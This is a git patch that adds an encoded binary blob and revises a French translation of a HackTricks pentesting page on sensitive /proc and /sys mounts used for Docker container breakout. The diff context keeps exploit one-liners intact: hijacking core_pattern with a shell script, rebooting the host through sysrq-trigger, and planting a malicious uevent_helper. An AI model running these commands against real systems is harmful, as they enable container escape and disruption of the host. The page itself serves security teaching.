z;+Mc9O~>4B7<@a!F9uDTL!3oRTnAa@&n3%XqRxg**7{sDLJ$_x90N=Gdv`GG_H@J2
zZ;350WzTCB)3l4#)lTau?FVw1#35lt+J1NI<u?y)Y`%-rU>wxjox5aJO~FveF-P1K
z?m11rl&fcdEsYAjCMgNlp;_FuF4KJ0=ZB|<I1<}HWHGDOiN_PAlEsqptKhnAS*tP?
z$t~<uW+AD7Y$5Sr^;N%-<Z+Th5=ruo7TIg8+!i+BIb$*tO)7ftF^t<$CA0{*Bq?Bd
z?>WGavdFR=W>-*P8|FMbrjmQl;hvT46R6R(V*Z447ZNs2Qpr3}QKs9r)FaW{)Kw+u
z#Jk+oNy=&k!dh?Vu*JsZ^A`;zf(Q&;gfY1A^lgF`PSM`ZDoxqt6&DZXB6$94+HtNN
zisHRVbGeJ`N`Yy_(Ad+g^OA2JVYOu@g9!7Ggwl_frKPp_@A6#cQ}q3@Z8_tt`2sfY
ze0)Cw$0P;8he`GOWDE}W2A?2*io_c7AcvC#8q#bgrhRnAhcsnU)bfmb(dzA<+*$nB
z2eoFZT#+vR=WA1!R`OOBF@nJZA)-m6Nem7sxUSU@3qw7qC*u~J%V%H%{biGHObbp9
zQU%H9iuQO7H2J%@r24;gsjR~fIO5QSuH0>ART@_tFx?CkEQM?*-i5Hw9dlL5wQyjE
z#1#tQHJ_Q+^1|V&&SHz&H(6y>AHW+(>TGmNaV6QcfG3Dm;WgFsIL`naJDY1`<d3TX
zB8EWt?k(V(TYsiCJJdT5rVLTIF0kOo4~kv5D4?ugli$WR;Y>p8Mq;f4w)hi<i`q68
z*-z;y6Qb%i$6n#oHy*$(ZV;MZg(OY4M7GC(bd75{z#^}Q%xI?kJ?cn=-jFL-Z~M<q
zi}uvK`lZ2WWDGm&JQR?ovA4$lbmmQ8X6@S6EN{i9G)L~MPS4la>U1j{hU0Qm{fib6
zl6eWV@$hX^32w!{bFynK?oVdh@7hnwk8TIxd&W7n>Ci7+>QyZmCxFHN+0mS<+~T7r
z%|{2a;e{Gl?U^2U4@>|uXg^g4j(SbQBkLjz()nP4-?{_KsKu<5mIdz~l=J(Q)j2rY
z4ilC4tohY>cOXPX0OhW0Z1w0S_CmUVQeQkRR&P7T)O^ABt8P-r!t&N@+g-{gK5Z`X
zl5D{)qd#{%YmJW5O0P(ey?@<fadW^0{eX))uZ03`#Qr@u;^Ht35ToValGhHhv;#uu
z6U4q<hg|Y~e#DHa6!_xs_&BtFyvAW^^2}QH#D<$$A0yZ1%BU#2(zd8QqVlyOrCGYw
zBavOvH>NJb!qF39Ud7$3)IjR=&<9Vx_S^o{_PRS<?99cy!Su@opMZENu-v9O`h00z
z&-AmC1h#(X)7T5L%H7`aDpxbSYrS;+lv^($JIxT}+gN%jH8{tdvDtsHey+>7oo<WL
z;Va(lbonZ2XNMKNOglbwVbvjN?4)_p)G^o6nsL}5All>0(yOohTakoQO|%=P%C_=3
zSI>=jiHKI|@2)tDms1|$5Ms~M9zVXHb@jWF=VHnCk8*9>_w^bms2DwNPNrPlltg}X
zKW)9(G?4k*YaoV8abp%a{J2pq-xvm6GnvAp%IBs6_^(=E)N#6d=MZ@n)b}I9w3<IZ
zy5`<a;u<{LY`tKichF7KIjnp&;=^NG+qS|0MV*R!`m?x`sUBv5>(7*|qmvumbb556
z@IGxxGxybYU3VY0Z0vlt_n54_8_Py)c^ho&o~yh3x|Y?SE*n^xcDPjF-R3%FaD#f%
zVsp`O$Fx*%y=sp_;Cu`C7Ex;t$OCEQ{Ic`0p)4D?{l}fw_3@{{nTIXJlMOwxbzirn
zHp*w-kq0^mllk{>wzWe*WGXJ#9O#ksIC^|0jq{0JF|iw)1+6Wwd3Xw04$HXwa#uot
z2u}gj)|UxfwFBc%W*B@<wh7)AzL8-WP_abmwq~u*gJkRt7KqSl!0R!bZxSnQb}hb~
z4PwbeKC_2z>DdGEsQhGES{g7M*}zD8`8aJkNW-sf*o1ns&T9dASfUOcT<`SN(eu-<
zcJN5gDKt)a#Rc^iR5q%D^4k9>`4~uq!e<cBLRx&USyc}GN{84Ip-HSX4luln?)W>6
zG0zU{;XU3;u4;}$%RnNBb7)T9)^#!R^g;S1!9QdD-;w<n(rn3eB%!PwfZxy)?FLxF
z?q*C(2jJ@!Ya1>PoD$}%Lz1=y<^T{|o|_C$z(!(S^W^ic3lrwfhfkqV>mtRouUfw$
z@AINXq6DZ5>8lV8op@_Q{ccO16En<rfXoq$i!U<AspHF@R&+?W$&vAJ+&zuqY{2Dr
z6g3@8<9|<O*Bhc+Zljs#FN*z?qoWg!Fu;mJQ)^%oq*776&ghlNInUuTi-408KID{Z
z{^#vZT%gegn?0uDVQ4ih)#}x7HW*#VkTuaXT19GtAiBM9lzQ4Z><$(AR_3rMwSiWO
zl}EdWx*h)>5GOPQt<ymiC0>P-gw%Pi+$m&1e<_~7-J&+|5Nc(N#Ki@Fw;Y#SNQ^yu
zB`ic~+v|nQY*n&XmW_AL75Sh}J|6hqNopn<$obdFU4_nd<F{pLBDnO;g}2%B2fHn)
z{-{RIABddSMW>YY;|2zXCbtdTm#&+w9ZT^ujY|?Y>RpE=);o`L7ar);B+5MP&`P|W
z5QU=~{dzO<F=6${X#tXB=uHRq(EDCI9RtZ;b6Nhycb|@}3SQT#Q_Zj9Uwq5SFEKiO
z<fsG#x-0g{a8I+`k!dxH1;1|NS~g5zti%Tpx|s8cp<ha`49aTyZ1h|{?ra+4kXK@z
z3(I%@dxugDE8kijhYOttKr&QhmV?tr_bM=G>=ugzRY6CWL0_O6YSd&tZ_nQ`WEc+@
zsVg+1U0T)EU<g*I@s8*6nJV`Ae7*uo&6Lwi37W4=`DXm!eBnX%i<S9l!!V-9xCW23
zK}YYs>4w9Ly-#P|9rRVyhq#W!-cl+o5WwDP(^XaDYV*7Uz9>3=4TN&Id_DJE1@X*X
zzQKDmsD49LMq;U7wHR2p|I(!H4VUP<MpXgY&cwX&{<#NTXm7kG1EQ=ZW$b<~>$=>S
z(u1>VXlt9>k1AJQwfE<VJrNW!;?93@TAjk%HZW8w!X?`K)^Itepu4n(*8}ed??ikl
zDe~ZrG~hWj^paVfVo+PKG`-mDZQdH7y^(8VWYd2wx`3#g?`~i`b55)f_c+h$h1~sb
z(I|E4&!s&{Fycoju}D-8UoF+i-IkGH|K;nsdx(ZbWz_m2esDP=KNT>F_qh*>p{$NL
zWT@-)U5l1$J(7=GtOK0phCH#v;Ux5gTny^cVi_?|etdXAeBj!Nm1{}Q5U)~?4G{1q
z_)>ADPg&sH{OE6m>rl)vB6LN)!QnnwKpxeR>&5_W<IlXhG}IyIm(?4-E<fzWV{O=A
zH>tOwU|!{NGe%X<MlLrUPm#mJH@x!4hbbd%%?1|ckt=Ds{u^<+Jytzwd~NvIcbOuY
zP7eujZM@5c6bTkHgx9rk$>8t(dO_dYVVx*<OvB=3V(t37Ok-$Uk2Vywb`2*-ob&9n
zl8P=oGp0!y@tg8e4$`j0Sl#u1q#I;!>wM}H^w}b<HS92E{ZkCe@wx&=t!%h@r0ui2
zXR6hJl$p-qd9D=({aa~O%^uM4{uQF>FeT<%F_bPy+%!Q3m!AdmvsF$(<mpuuit>4V
zAQA^Owj_-ciZh~79=Y)nx$7v*uc&zCc{_v*3g^%JEjqufhnUiqf=F~!UZ|M!|Nics
z_@#VQUFFNUdmvwVE{me_XP`yzBw+30fxhy_enTn5O4r`Y<9i5w*u$!jun<ah>LN3+
zez$y~0%Rh&1?TUZyg-=n5&=6eRS`2zm*LC0w7TUtApvLg8H47sIAt6<vj7m&woha?
zmKytH1>&A(<==UU@GW6hA26bOvP2{Bv$t}Rh22Dy-1F$1l}=~JL!0C@vPF@e1CZcH
zP^*lUJo%jQe$K<gLzk=uwD<<&dA^B`6r5UKd?9YtT<TWVeaSD$@LE&0$OXgExcET-
zfz{{4f%rGj_yoq`tcNYl8aI`uGepM+SVVcvMdx@qqeWkr$)jG#FI-Z}M=fd{*LVSQ
z&~A7WMoszfrB^cZCe;X<rUQ85xn@cDo5d(LSnGShQ>`Tl*B{whHZDp994)6}SiWe*
zQ;1Q#`NqBN^ItG9_)w&dSFRRC0gUAGBq%$NJ@7Ha1^kX4tEB5QgaK$d!;l1jjXPX`
z1UatJe(>K+WCsVC8(Anmz?%o^-2?E10|5B$$!@&f?aV`%R|SNiq3oOj#jWx4Ik;G6
zV4~O$fi`*oh_T+~b5suy{j*SuO3GRnO!K9GH1b21z?oB2tTIYV^7cfjXFrTj8)l4j
zPS8O>kL)^J-*aFBwSZ|0OYb|JhIPv4qRv03Aa!}?W-0;{YP^!<&z~3b1<ku7IivZh
z=sL}ca7OF#>V*PX`XaF^3BGMi0%Lx0oH_1UPa#<`B1e!)4xniw!ogO%>#=|=>v|SJ
z<&<*r+CWKc;O;{1Y;FKHDSp_|ck1CrR4^{?*1*oXMjW>6w88!3-tR!j^~$|>*#}zw
zGy>eI7msjJ*LQuKKZf(mwf)Jr2y-<&!e-0fOZF_rup6wBfnElFUSD$s5&$ru-x%B6
zZ_xmKH$ly2^kRP!KVJf+&=6LUuI&-ZyIGBMGI|Yyn6(-9hP*`i-?4b0##@>uP|_Ya
zHPj5kAUh=-PbOpl5%?)*3q9#8V_%vEGu~3QV!sVHAf-<4*)XaUEj51{=*N+^f3{qn
zTLX3VA3UU;kbhgGehrLxKX^g^=^q)LL;z5y&W+eZR4R?9-O~L$2)|&x?f6=3Y!m?1
zv_@r29aZ@cl9?9>Y43!^aqlrnx|RM7XFcH3q?li9fwZmD*ITYjJ9+#fklCVDEm#g6
zVDzAlC}(uJz%agO+gA<%t^sI?A!Eatg^zX#Ac>Wt)7d~8FJfWa7E&V#1=4uzU5RLk
zRtSE;?J^}E5NGE17i{?>ka=RkfvRa?2I)Y4unsw7kXh&AW#JVQ21dRUA_U@v%lfz>
zV`wr*dwzxp$50l8JU00$6F_;ZA7$swv;1aj3wJ}y;=Tz`X1$aQ_91OlaRG9Zp?;&U
zP?-dhXETwMc)hPfo>G@_VB|C`E_V9it(8~9qwj?-apel1nO_<{xS|!mkN2a>E&a-Y
zRKh~d9&2~f=gN?@{svy&D=drT!G9sQjYwe2yt^FLCqS)ml)ivp-hjE{hw-iPZ?Bdd
zKPLXu>kz?X06MfezLUD*hD3eM3RSbKcE|=GdI#~RsNVD6%BV-{w7sBb8{R<uo*?{Y
zprWv}D<nN<wN5d=!UvWmWB)7uv})lYR(12s4-SH_sGx^oqH=O_Wj<JCs@ptpXE{dM
zesEAz!Dr>1BpmlKiq}1%Uk~BgmQvMO@-Td^vUIDxKNEEeuBoZ{mRX?g3}uI;^<I(S
zIOB^|R+__gscFoJyjG2&gpPf5A1ynMYkI2p677|=K;FS7M!e>3=Zv8Y4^H1X{98Yr
zfc!31%&9ii7X{EMlUs-l0YSd`o;7P}<zfX;v(KwR{@oe6xQ`S1%7j_z(F%{MuLZIv
zuDDKV<5+R8T8HxP-ehKHk2kN~-1hu9WkBv|OVdC$)X#2?x3zakQfl)G6jr_rGp)dh
z4h8N`U!Q+^(w1U1ml;F8fI&`L@;dgFG<<d%%{aFz8!u|C(+S{y{06Q6IaCm;0~{#0
z+B7H*2>7QX1Pr82jYdGv0I2l*x5lf48aQ;r)}UC7kw@mlUDs22O9q8TIw&MOMiKwh
z3Wy}-WS|jHb8t~U;KmsEa+6E~f%BIn3`~RGzkiP#`7kpFT#kL78f7dptGX`lg%+e^
z+>mZf$_?{Mfi@6X2utN1xNd~4#qJmT!4vPL1A^~@zt46U#ypyxU%RH3ouVSPKLi2X
zRagjXsXaAOPl>5zcls;UkXyE?i4*PTG~`Rb8N-gm48uMXAhl3O%=0(g0b94fu%M3u
z_A;+X`-ObU`Tkrzt*0!wjIuIS-1=F4Nm+K*bqy(t<c_jWCwHO>yi>;1CgtRsj(nB4
zkNZF>bBmqup_t=-(#3S_vQIcG)})6Aq%;rt72Yq5m`#+nkoNO5CqhFce8@rG&ia@3
zm9qg*;H_*4uRZ*n&>KEZNBk_1Q_5oF-1OoRnY(X9-P>X`9{AThEqnpV`fOmOFL?K&
zbj<gj#2=iZ!kRh~sy4P<@oW$MaVmTWKhIzv`~K{tE_CqjaMsN^<OaeS`y*8d*u=&$
z8oVKmIl6X4^C|SA2kwRVJs{@U&Uy_L(&Gz4)ddKknT6F=x9a)i3sJQguOZbNnw=6e
zYY=NV>|B8@?qpi~E6E12Otr)DJ?8S<U0BKvijt+7Aoir|9Z$Ax?|OED>12t^q`#jJ
ziLuPKw;`j9=uW>Y4krhT?|yNYMVk9Bq-@RAZz1E1ho)%O*4%N^U-e$SJa*2<Jkp}0
z1n|`mmaFE_2FI#o;?<4wjE`P3=KO-;+~03dXQ87^JfIaNWMB;r=03o)XT(7qZcvrm
z6KNubLoD=48tKM@v-!uFM$y$fO2y;1)oz5b=&lckh0~t7-EGWy5K0YhV>WKrc%mLp
zoOYe~66-WsV;)SJ7JYxoD*7=-gCzmaPXjpFV5+xnb-;(|A%}hSQaYuAw;IDkq!LGB
zcx10f3n)n3j9|Nbl|7JD3U4nkbc|Az-;RljdIM|t=%8r&COJ_ge`jD8+e`j-O?i4Z
z#=uPO$y`E`<`%#CT#v%a$@-^YthAI13Df$xiR8yR%(s(#*?Y;ZLg4zKzAVY(*%vgr
zOBIBn47`GMh*!9Oax5^fO;jW<(hU>`oRrJ5pp)BO7`^O;-ik{NE;{$&y`t=tXYm!M
zAB}e507jX*(LBe@#xsI6(aCkCJx1Zr3HIh41k2086@oO$PDwmI|7`JrY-F9Lke_v&
z&VgG^9^|w6UT=cimbWx|El#!rk&z+QMgi&#yh*Z1ZddV7pkn?2H(h#OP;f?`ZxFCe
z2b^b}Kp-V=Wn00B&1tku2cJogK)QL|U4_M9Xef~a!4hJH*x5863-;>W%7Eb%a((NX
z?3Ay10||Z49@$VV4sOtg!pRQz%eH0TZ#RjyVym3TA8NDIk#HU^u*9Ae1+IAElLdwh
zXTvGsjO-npdL%>BDwnfK=E|DTI`rlKcm{CrrEfpz?}$qK@ph5JXWW^q0Qm9V{4Ur|
zA6S*}<PC6FBUMo#Kaci7$`0c<95F6jLAn0J-~vVR_L<f)LYY1gC!F10o4EynOCx{X
z(#pQ|%I4e46h*&+AHChlGBUxz7!a)UZ9YZ1p@BRv{o>WD_#fBWthkEf%-TB>qKD~j
zb$lf%*3X2T-0*FZ?p2hmA9@-QT$KL#v){VW40Lw`F)0Li@lMN5_`b$3_7|Is;Bbq_
zIe?6B8^{Bhdx!6s_y9k_e^~&nnU;_tDpSEb=6*XVAv`eBh3a*9xyfgLHWd)doy&81
zhmLGqCgTQ}D^7-`y7fV}>?`sg*=t~#Ik*f<LEZjkzfuEMq&E3X@R+0T<>vw_2*}A+
zG5Uo}mb2pnZOGsqB`&EF*k|W))5MDk<zR@ktGyro3|qiv>S$Uh>pv;YfLve-6o?0O
z@jO+jLfILpxB85+^IkI<((F(Pi8MvSutPpeKN?K*YJm6;G1|{hLvk9C?~0tVw$Zx#
zfju>ZEO(rH&bbOH)HeLJSr!~(`*yHvdn1*Z=<BDUcV%&H*_cNrF+p>_KVHZ`f$pDW
zF|D599;Enioy(xre&?O&`>-pgX5s{**;ohQ9Ttb`Q~VpqrEUCi+fRM1s)GRkYgU`w
z<SaXSrFx2)vXExOy&>y3qAF372QPY1I`-p>=$V<%Spqt;sUP681Jh-o<<PawmWM47
zr+CQqt0ef#t9`Ym^@n~|Wp_PZ=rO+))P0AC7hMUh-ei#roPEwK_r##U7$&g*c7v`R
zq)pi@d=YsG?MyT5Xpqzrd6?$|<~5f`{7}A`nTSrZlT+|wvb?9A=+>l95@}{MN%*2O
zeC<NLI7r3|K1Onla^Ir-D7C`DjMI!=Me@#GLKm~UJA8K@nk4TGqiO2%GlIuee0|@I
zEBbr2AXCYpYScU?s-8`=;ZkE^{EdfuhL4`~Kv1swet%AIPxr3o4m7eUA|yEYGKzoC
z0@yJv8DGcY<_e>Xw`J_^^!o0m9{vbVA%>3~phOBiJ&z1@r6)=@;MuKY8iTf!A34!(
z_byn(nzc=d`%DIX7!we*sLWF!$0(Av@9)sO&5_fskHd!gfBji-LGm7qyG~s<Rq^}<
zqoTM`2cKX*ZC4Zc-Bf=ZwiQFec*y_y=CYQdE8Dw_u#MUBf<f0qzN?=CtVh0Am)UgJ
zJc1*-C?_wPW=xs5r73PVrbR96?BoR<h_DEZ6&4Zc{1hHJw`JXB4TKyDHD0q>b1Ywt
zaS^;AtyNZ5#!R|713Ioo-7E=mJf^KfOSbEt+dIBWdp-U0)^|)WW+qw^*?^Yhh+6#T
z{OER!ic}ps#+JOh;GZG-dolR$N_JZn*rJFQ8T^ZN-(M_-hEjmN$4+l``v0PawWMJo
z4b9P08miX~{`a;2e~teaeIqy^TA{yZu=b|H{rRww>7(74rgv10QS@i52%*3Kz#z6v
zo;x+=qRa^F%{+2fuV7_@dvzv1>HvWIj}Y?utpvYG91u&VqgcnlIgVY2uOC}vj=E{y
zD=Q-HU$;%qNy8FhO*udmI5+v%;a7UGn<~gP_K4cu?E8!EsI^!i_;>KXjV*OTdUK-B
zr!8ELVQ2e$s=^BCLxRv>8Oa4Xp3*h}04%?Pu%JL2NsX|Oa{bx=wywV?ITc_pN{9d2
z51b|0fAY`X_B)Wc`+txGwEh5)b66l<G}`6NDrI>xAd1hBk8#x_X_;;*+(?sk{OafD
zZzENkKx~&Ty|dK5a`(l{WDcoQ86oMHgv68^RfSbnkGy!%|C|_k<h4Cp#`O&57cp<_
zgw^~m2$`2wemc=vIhk1B^L@qB7Hfrdst)j(pXfbUHaS@>y|5)G`ks*LcSKMnl;!{}
zJrf7;LFN8|X?W4wxxFv{J=I}&N=f$qXv6tuSsLK9Qgg`t^Id;Ypn)W_M2&o&OxF32
zDnRJ?F_TTCZA(NgoKrXOS8NGs)coNSC&zc!c1R@)bcm;!jtBwAwHGnFGEVT70yode
z3oTZlFRq(gdWyW2<{@5oyh=w?3E!Qk39pb3n#3>&;c0kqP|mk~w)Z*B%W6b33NU?u
z<DN-fUVCI0Euqy+t|`G`V{9le!XzwSDg<Z{+YEIEO+VXx*mV(M+Z2KgP(HW4RhneJ
ziB#7v6#7FJjU_A}S4ouSAI7eoVU#H!Fc*LI4rFzEEBFXM95W^5PJZ^#lhQDY1+%^G
z=;%@Hw)qj*w$M_hL}6yM*or9Gc^SiYVJ>6nB1w{^FyZJQqO<%$f0eXdJN@(|n2AxM
z=GsyNZmjP?gCgCvC!MXU_}5@o$zlthL@Yl$Cb**fjJAJaV*zMaS=)t|wN{xh$HD!}
z0i@2+9qeFw@}G{QN+81EXO=o8&aeS{5$nYH&eTu;hYw1j44L+BVh~BJK!0Lv$p?|V
z-<dWDDSEUlcc?ZcpEi6@SN4qZt-QkKw+8HqlI?XP&YbeyAw@Art1X$`Rqo8r?n~R$
z<n^uCaK@JTaS+c953!|s657pfr!cbB>CH11O88La#Xo6$J@;k;hP?JfxUk3_Z`a21
zp)1Fgt{uL>s#E-cOQa{rd2^;_$6KW8Fz@rbb{&pK$w_srSN_r&nUi)`;-txD<wCd%
zG^Q6!FOgwO#*tM{A9iwQ%V!Y55&?5yVshi)N?rB*sbQyvRd9E3zu2EV3~B!Cd#_No
z359QoIxp+O4qhY3f_j5N?mZ07AtCnN9S=!XvLZ=`t~8G!rvyeODdnca7Llzi6tBgz
z&cc7_g333B%{uJO(X+d#aEk8E{Kbclac(2OV#7HfiU&PIu7pJ1wEcK|6O5~jPRMd)
z_FY-Vc9SbnW>t~LrF%K@d`BznQ&+(spaXaQWY56Z^2wly?`AUQhKJ{U6G~TF1YZ*T
z{Kt*yuIA`1a9m0^=n2~XA!$bT+5GLTQ#CsUF%c~Q&DfU6=J|1#+o@-y?oWm}j$EFG
z+wkR7|1}m08XKxCPLSQ(wpz%t7TnQJib_$+RkFN_n7WcJbK|F?@U_fY4YF<TI38~p
zQmed{?L_-<?p{o!j!#g1K{kLL%dBuLJ^0s%SFvUoFy2@u4qa3l_gP(9Z$YjQtj3?9
z76hgUk*R4_jm`8Q3E+20+00a1vOg%PMrE1)DP_#-{ollBAkUbYD6H#cSN_ytCXT$6
z&{c4)#GvJ$lHw37kvcFP^3Wnt<PX9?3l*FkWJiQGxAuR{QQJKsB1n?_-Zk*2NCZ{V
zy#a%@T%#TSCx3k)NNh(3xwt6I@nwBO+3f!?X@WN(8|)Oh<^mfnYJn6{Qc^-0@1INy
z9sA+kJ9&Dfe8%3~KB(aa2l+MapWL&RHllOW*iKFoQEr_#+0}sSup-ExQ$IsLD}zr*
z-Po6v;R(Ad+@D6BB1i!V;|0!poTo!+?Nu6n_I$vMkszNHlul^Caag)hI|12W-$Mj0
z6~Fvf#(N(O?y79V9>MH5smuuvqB;IC<Ht|rjh4P#1y7e|+5cZ65dcI2I#wJ`B|sGK
z^AoFwZvEKcYD4eWg&bh@1Rc!pMTJa<G={g%Q=g_+sbCHpEn=N*nD^h(a*Y8U7$roK
zByX26P#@VHImbEQB~F+4o4*nRTI*=TPI2kHO;$>HTqPg1(7Cg2OEU5u1K;>;61-Eh
zSxPzfWy+DDf^pXfZVEAvzWbDt7m@i0Xp|#OWjxw@p09Szus~?P)%2INsM6bPqQXxp
zV$l-LRMQQSqy5IWQeX&6zxi7qPQ6oE`;jSOOHi0*qR{bNzN$+7VUj-D91U713Vw3Q
zeEL8Qp=jqk&q(+`1D;J=P-)XnX$KS(bvYn?fM8-{sUu!-dK!K#{u%ZCE&FIux}J~c
zFW3GO-}&*Q^}6i0&EL{Gec~K{z-&AX;gV*G$y18_Mq(vk_yvU^1c?tAd{v-rt#>!N
z#Cd1rx$xT?`z#t53M$Rtj!_!xA@yGI{nRF{bw76%{+3v|H-ReA&sz}FBtEV@?p0ba
zd^p&82*2Od0oqq0Z}=Uv+IXE0z~|y9w;WZ{jKxV?Ttj<3_j8-x6r12!UnD`1qXhS3
zz%wkNGnt#`e~T_s#lID#G-9VjUi373#J94g*TpvsWbLE&?ig(c#%mxSoxf?6Q@(}@
z@|~HfZJAQ)eMZM<!Pae4J~n5^x8GBD<RDiXbM-d#1Xhyx&5lWKq)8u;ic8&;RE+)d
zB*D}5%_=yvXTShx^Q*|47426Kl_=HQN`-RF_-;?ohgsr?7Iq+IJ$bnB#t(O!N+@b$
z4w?H+UWe(O&~xW2`H_3d^O@E2CF+~i3si`xD7Ov&<&V%$gQH}pZfT!0l@cF9a=vU3
zQW;7Nc7;ij33bcVSysg!qV@zGA}qH7N?7t76hvaC<p;aIAEc;RxeWD^E&MSje)lw5
zyf1h{if?lr=2FF989_pck`P-xe$()tOp|fIMsPq>-j`DbA1c46Ii(>&6W2vC6Qz+i
z2T+B}y*`T`FsbJ>y3G6IsWFVfRFqbpf#R9%+yttg0I`!Nl?UbDm;7wKh+}+8xplD8
zpDO!n!H~^6AV5q()|5JMipcSo0;^7;GuV^BwU|_W@H(>SRblC9DS2>b3E2_yO`7cG
z_XV6wK0?M^cBqI4N*rPJRM<)Dty{1q#+V;?GeP@Ci7tJWqjBU#7^xh!rF$Lza_iTv
ziEo-`_6Q~b1UEsT2)iuXop^zolr>3y$IrS#201@&+yn;B=F6+p<(rCkwfWk>?g(=z
z{&XnH+2<Y~ly=c;1U~+h#(Q671SKFA@w+K2yS=@e3+%Mw5v1rY#8d5Un1;H&2%rv+
zPTCz>B1BgX(l-{}I^)M-Nn{B{1<(N3Ii`#lUs>{!;;5}6?x}8L3F~*c6Yr|)LdG6%
zLP95-gL7w|7YLX!QCgIL4eJ4;n1%Um3eCBm#sviwKEPc_a91uUCuICAWopg%6F=hE
z9z#-skVFLOF+2W4IjYB%ru`(!s}+uJ0u|rf7U(l6=b{!mCwj+*R*-eG!<zC<BXm@j
z=9tA~{KYqt3h~7H8Q24LlYRTCdR|I)wkq+*vL8)~$btDC^W&(0C1csnP@_ZR$+`;=
z5SpA|rp*s&k4(VrO(2cDkTO@=MemQ7kl4c87fHsY#-CqMm3Cfn71kb$%`@vIEp#1|
zT!*!s^{q+XQ)dnne~3#P8|!;P6QbC>D`XYC!9So3Fbm8Pf$YnUDfI2{>B*=0r8GtN
zx-aPHqL*Sn1{>s{1~xuJ+DaJg+#94w+Q}QiRVB#HP<XIx`@UdlAdB>!5rncX!y~u<
zn+HBK<CEzZuX2UP?K2>_`h)?^OI#m&MoCg&2~4FvJt%g^`>195>#|F~J6jWS>IQsO
zV6M;L81Qq1db*eG(i6%wDqw#d3;A~R`T3<PZn<^1NoK1*RT`G*w3FT=A`Az|4qXMV
z7XWHGoaXRo$BrCm4!IbSqedN>jcY7yGd;V$#evcLygWCy6rLI|*f0N&U885pqHTt|
z@4f#1;Gz~5I>|vkgSDLdd$Vz18hL7e`uw+KEGrWw)~5vbA31=#(9l&^HtPTVcBvmA
z?ZBp{UBSff-<o?LRJLUg{#{jN7MLPu`HB?xW%CaSK@tz$-&F;l9GC{-4jb_U?EXOl
zSPlIBK#-$4bXCBQ@j}dh+)zs}QCk0g!14Tn%63d$c!K&rjqbm|(-5n_A26v(2$IyN
tnmYH#{J*U?!!P~$%Ku-Cf6153KKZefciX}zf(H20xTUKKy<r*le*h(o$14B;

literal 0
HcmV?d00001

diff --git a/src/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/sensitive-mounts.md b/src/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/sensitive-mounts.md
index c27acf844..7a780f93e 100644
--- a/src/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/sensitive-mounts.md
+++ b/src/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/sensitive-mounts.md
@@ -2,11 +2,11 @@
 
 {{#include ../../../../banners/hacktricks-training.md}}
 
-L'exposition de `/proc` et `/sys` sans une isolation appropriée des espaces de noms introduit des risques de sécurité significatifs, y compris l'augmentation de la surface d'attaque et la divulgation d'informations. Ces répertoires contiennent des fichiers sensibles qui, s'ils sont mal configurés ou accessibles par un utilisateur non autorisé, peuvent conduire à une évasion de conteneur, à une modification de l'hôte ou fournir des informations aidant à d'autres attaques. Par exemple, le montage incorrect de `-v /proc:/host/proc` peut contourner la protection AppArmor en raison de sa nature basée sur le chemin, laissant `/host/proc` non protégé.
+L'exposition de `/proc`, `/sys` et `/var` sans une isolation appropriée des espaces de noms introduit des risques de sécurité significatifs, y compris l'élargissement de la surface d'attaque et la divulgation d'informations. Ces répertoires contiennent des fichiers sensibles qui, s'ils sont mal configurés ou accessibles par un utilisateur non autorisé, peuvent conduire à une évasion de conteneur, à une modification de l'hôte ou fournir des informations aidant à d'autres attaques. Par exemple, le montage incorrect de `-v /proc:/host/proc` peut contourner la protection AppArmor en raison de sa nature basée sur le chemin, laissant `/host/proc` non protégé.
 
 **Vous pouvez trouver plus de détails sur chaque vulnérabilité potentielle dans** [**https://0xn3va.gitbook.io/cheat-sheets/container/escaping/sensitive-mounts**](https://0xn3va.gitbook.io/cheat-sheets/container/escaping/sensitive-mounts)**.**
 
-## Vulnérabilités procfs
+## Vulnérabilités de procfs
 
 ### `/proc/sys`
 
@@ -19,7 +19,7 @@ Ce répertoire permet d'accéder à la modification des variables du noyau, gén
 - **Exemple de test et d'exploitation** :
 
 ```bash
-[ -w /proc/sys/kernel/core_pattern ] && echo Yes # Test d'accès en écriture
+[ -w /proc/sys/kernel/core_pattern ] && echo Yes # Tester l'accès en écriture
 cd /proc/sys/kernel
 echo "|$overlay/shell.sh" > core_pattern # Définir un gestionnaire personnalisé
 sleep 5 && ./crash & # Déclencher le gestionnaire
@@ -51,7 +51,7 @@ ls -l $(cat /proc/sys/kernel/modprobe) # Vérifier l'accès à modprobe
 - Peut conduire à une élévation de privilèges ou à un accès shell root si `/proc/sys/fs/binfmt_misc/register` est accessible en écriture.
 - Exploit pertinent et explication :
 - [Poor man's rootkit via binfmt_misc](https://github.com/toffan/binfmt_misc)
-- Tutoriel approfondi : [Video link](https://www.youtube.com/watch?v=WBC7hhgMvQQ)
+- Tutoriel approfondi : [Lien vidéo](https://www.youtube.com/watch?v=WBC7hhgMvQQ)
 
 ### Autres dans `/proc`
 
@@ -78,12 +78,12 @@ echo b > /proc/sysrq-trigger # Redémarre l'hôte
 
 - Liste les symboles exportés par le noyau et leurs adresses.
 - Essentiel pour le développement d'exploits du noyau, en particulier pour surmonter KASLR.
-- Les informations d'adresse sont restreintes avec `kptr_restrict` défini sur `1` ou `2`.
+- Les informations d'adresse sont restreintes avec `kptr_restrict` réglé sur `1` ou `2`.
 - Détails dans [proc(5)](https://man7.org/linux/man-pages/man5/proc.5.html).
 
 #### **`/proc/[pid]/mem`**
 
-- Interface avec le périphérique de mémoire du noyau `/dev/mem`.
+- Interface avec le périphérique mémoire du noyau `/dev/mem`.
 - Historiquement vulnérable aux attaques d'élévation de privilèges.
 - Plus d'informations sur [proc(5)](https://man7.org/linux/man-pages/man5/proc.5.html).
 
@@ -114,11 +114,11 @@ echo b > /proc/sysrq-trigger # Redémarre l'hôte
 - Fournit des informations sur les points de montage dans l'espace de noms de montage du processus.
 - Expose l'emplacement du `rootfs` ou de l'image du conteneur.
 
-### Vulnérabilités `/sys`
+### Vulnérabilités de `/sys`
 
 #### **`/sys/kernel/uevent_helper`**
 
-- Utilisé pour gérer les `uevents` des périphériques du noyau.
+- Utilisé pour gérer les `uevents` des dispositifs du noyau.
 - Écrire dans `/sys/kernel/uevent_helper` peut exécuter des scripts arbitraires lors des déclenchements de `uevent`.
 - **Exemple d'exploitation** : %%%bash
 
@@ -130,7 +130,7 @@ echo "#!/bin/sh" > /evil-helper echo "ps > /output" >> /evil-helper chmod +x /ev
 
 host*path=$(sed -n 's/.*\perdir=(\[^,]\_).\*/\1/p' /etc/mtab)
 
-#### Définit uevent_helper sur l'assistant malveillant
+#### Définit uevent_helper sur le gestionnaire malveillant
 
